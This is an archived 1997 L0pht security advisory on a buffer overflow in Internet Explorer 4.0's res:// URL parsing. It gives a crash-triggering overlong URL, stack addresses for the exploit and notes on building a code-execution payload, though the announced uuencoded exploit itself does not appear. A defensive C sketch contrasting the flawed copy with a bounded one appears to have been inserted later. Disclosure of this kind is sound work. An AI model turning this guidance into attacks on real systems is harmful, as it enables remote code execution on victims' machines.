Bugtraq mailing list archives
L0pht Advisory: IE4.0
From: dildog () L0PHT COM (DilDog)
Date: Mon, 10 Nov 1997 15:43:06 -0500
Document: L0pht Security Advisory
URL Origin: http://l0pht.com/advisories.html
Release Date: November 1st, 1997
Application: Microsoft Internet Explorer 4.0 Suite
Severity: Viewing remote HTML content can execute arbitrary native code
Author: dildog () l0pht com
Operating Sys: Windows 95
-------------------------------------------------------------------------------
========
Scenario
========
The Microsoft Internet Explorer 4.0 Suite, including all programs supplied
with it that read and/or process HTML from local machines, intranet
machines, or remote internet machines, is subject to a buffer overflow in the
HTML decoding process. The buffer overflow can cause the application to page
fault or, in the worst case, execute arbitrary precompiled native code.
=======
Example
=======
1. Copy the supplied HTML file(s) into a location that is accessible via the
target application.
2. Point to it. Look at it.
3. Click on the link. (or let someone click it for you)
4. Become aware of what happens to your machine.
5. Freak out and beg Microsoft to make the bad man stop.
=================
Technical Details
=================
The problem here lies in the deciphering of the URL line format itself. The
base HTML library that is used by the Internet Explorer 4.0 Suite is
vulnerable, and so are the following programs that use it:
- Outlook Express (both mail and news)
- Windows Explorer
- Internet Explorer (different than regular explorer, really)
This problem, because it stems from a programming flaw in the HTML decoding
system, is unaffected by the Explorer "Security Zones" feature. In other
words, if you turn on the highest security level for the zone from where the
exploit HTML is being viewed, you are still vulnerable.
The critical problem here is a buffer overflow in the parsing of a particular
new type of URL protocol. The "res://" type of URL is meant to allow access
to a local resource embedded in a local DLL file. This is useful for
archiving entire websites into a DLL and is not, in its truest concept, a
security flaw.
For example, to read something out of the IE4.0 Tour (stored in a DLL) try
the following URL: res://ie4tour.dll/page1-6.htm
The buffer overflow is on the actual filename specified. To crash your
machine go ahead and try res://blahblahblah ... blahblah/ in your Internet
Explorer window where the amount of 'blah' equals 265 characters.
The function that goes through the filename and validates it is flawed on
Windows 95. Without checking the length, the filename is uppercased,
concatenated with '.DLL' if it isn't there already, and in the process,
copied into a fixed size buffer.
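The flawed routine described above, sketched as an added example (not code from the advisory or from Microsoft): the unchecked uppercase-and-append pattern next to a bounded version that computes the final length before writing anything. The function names and the 260-byte buffer size are assumptions; the advisory states neither.

```c
#include <ctype.h>
#include <string.h>

/* Assumed buffer size (Windows MAX_PATH); the advisory does not state it. */
#define MODULE_BUF 260

/* The unchecked pattern the advisory describes, for contrast only (never
 * called here): uppercase, then append ".DLL", into a fixed-size buffer. */
void normalize_unchecked(const char *name, char *out)
{
    size_t i = 0;
    for (; name[i]; i++)              /* no bound: runs past out[] on long input */
        out[i] = (char)toupper((unsigned char)name[i]);
    out[i] = '\0';
    if (i < 4 || strcmp(out + i - 4, ".DLL") != 0)
        strcat(out, ".DLL");          /* up to 4 more bytes past the end */
}

/* Case-insensitive check for a trailing ".DLL" on the first n bytes of s. */
static int ends_with_dll(const char *s, size_t n)
{
    static const char ext[] = ".DLL";
    if (n < 4) return 0;
    for (size_t i = 0; i < 4; i++)
        if (toupper((unsigned char)s[n - 4 + i]) != ext[i]) return 0;
    return 1;
}

/* Bounded version: take the module name from "res://module/resource",
 * compute the final length first, and refuse before writing a byte.
 * Returns 0 on success, -1 on malformed or oversized input. */
int res_module_name(const char *url, char *out, size_t outsz)
{
    if (strncmp(url, "res://", 6) != 0) return -1;
    const char *name = url + 6;
    size_t n = strcspn(name, "/");    /* module name ends at the first '/' */
    if (n == 0) return -1;
    int has_ext = ends_with_dll(name, n);
    size_t need = n + (has_ext ? 0 : 4) + 1;   /* name + ".DLL" + NUL */
    if (need > outsz) return -1;
    for (size_t i = 0; i < n; i++)
        out[i] = (char)toupper((unsigned char)name[i]);
    if (!has_ext) memcpy(out + n, ".DLL", 4);
    out[need - 1] = '\0';
    return 0;
}
```

With the assumed 260-byte buffer, the 265-character name from the advisory is rejected and the output buffer is left untouched.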
========
Solution
========
Currently, there is no solution available for this flaw. You can't set any
Internet Explorer options to avoid it, and you are not protected by any
level of zone security. Simply don't surf the web, read email or view
net news using Internet Explorer 4.0 until Microsoft puts up a hotfix.
============
Exploit Code
============
Here we go...
When constructing the exploit we want to try something useful.
Let's start with appending text of your choice to AUTOEXEC.BAT...
(note that running native code lets you do pretty much anything you want)
Note that the location of the exploit string in the stack is very important
and it varies from target application to target application.
Constructing the exploit string:
Figure out stack location for exploit code...
App                  Loc
Internet Explorer    0x0057C144
Windows Explorer     0x0088A0F4
...
Yeah, I know that those locations have null bytes in them and you can't
put those (or lowercase letters, or CR/LF or 0x07 or anything like that)
in the exploit string... but we'll let Microsoft fix that for us. Step thru
the process to see IE add that extra null character for you. Will they
ever cease to amaze...
Put together what you wanna do, tack on the necessary jump addresses and
all that. That's it.
And now, UUENCODED to preserve freshness:
*************************************************************************
* MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_ *
* REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or *
* click on the IE desktop icon (run iexplore.exe) and type in the name *
* of the file into the URL line) IT WON'T WORK OTHERWISE!!!! *
* (though it could be made to do so) *
*************************************************************************
A haiku:
Microsoft IE
Is there no security?
Not if you ask me.
dildog () l0pht com (11/1/97)
-------------------------------------------------------------------------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://l0pht.com/advisories.html
